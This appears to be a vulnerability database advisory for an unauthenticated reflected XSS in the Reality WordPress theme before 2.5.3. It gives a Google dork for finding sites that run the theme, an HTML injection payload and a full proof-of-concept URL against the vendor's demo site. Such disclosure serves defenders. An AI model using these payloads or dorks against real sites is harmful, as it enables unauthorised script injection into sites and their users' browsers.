Reality < 2.5.3 - Unauthenticated Reflected XSS

2020-02-07T00:00:00
ID WPEX-ID:10064
Type wpexploit
Reporter m0ze
Modified 2020-07-29T00:00:00

Description

WordPress Vulnerability - Reality < 2.5.3 - Unauthenticated Reflected XSS

                                        
----[]- Info: -[]----
Demo website: http://reality.inwavethemes.com/
Google Dork: /wp-content/themes/reality/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=(alert)(`m0ze`);//">

PoC: http://reality.inwavethemes.com/properties/?status=&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`m0ze`);//%22%3E&type=&from-year=&to-year=&min-price=&max-price=&bathrooms=&bedrooms=&garages=&min-garages_size=&max-garages_size=&min-land_size=&max-land_size=